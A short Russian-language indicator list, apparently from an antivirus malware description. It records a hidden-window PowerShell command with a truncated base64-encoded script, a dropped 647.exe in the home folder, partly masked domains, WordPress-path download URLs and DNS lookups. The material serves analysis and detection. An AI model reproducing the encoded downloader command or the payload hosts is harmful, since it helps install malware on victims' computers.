Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABiAGoAMwBYAGkAYQA2AD0AJwB2AGoASQBMAFMAVQAnADsAJABJAEUAawBvAFQANQAgAD0AIAAnADYANAA3ACcAOwAkAEUAcwBtAGIAbwA2AFcAVAA9ACcAcQB1AGkATABRAGYANwBWACcAOwAkAEcAdwA3AEkAegBGAG8AbgA9ACQAZQBuAHYAO...
- %HOMEPATH%\647.exe
- %HOMEPATH%\647.exe
- 'up##sl.com':80
- 'ad####cademy.com':80
- 'ad####cademy.com':443
- http://up##sl.com/wp-admin/x60/
- http://www.up##sl.com/wp-admin/x60/
- http://ad####cademy.com/wp-content/0774/
- 'ad####cademy.com':443
- DNS ASK up##sl.com
- DNS ASK et###rsery.com
- DNS ASK ad####cademy.com
- DNS ASK ka####neeglute.xyz
- DNS ASK wb####.archi-edge.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABiAGoAMwBYAGkAYQA2AD0AJwB2AGoASQBMAFMAVQAnADsAJABJAEUAawBvAFQANQAgAD0AIAAnADYANAA3ACcAOwAkAEUAcwBtAGIAbwA2AFcAVAA9ACcAcQB1AGkATABRAGYANwBWACcAOwAkAEcAdwA3AEkAegBGAG8AbgA9ACQAZQBuAHYAO...' (со скрытым окном)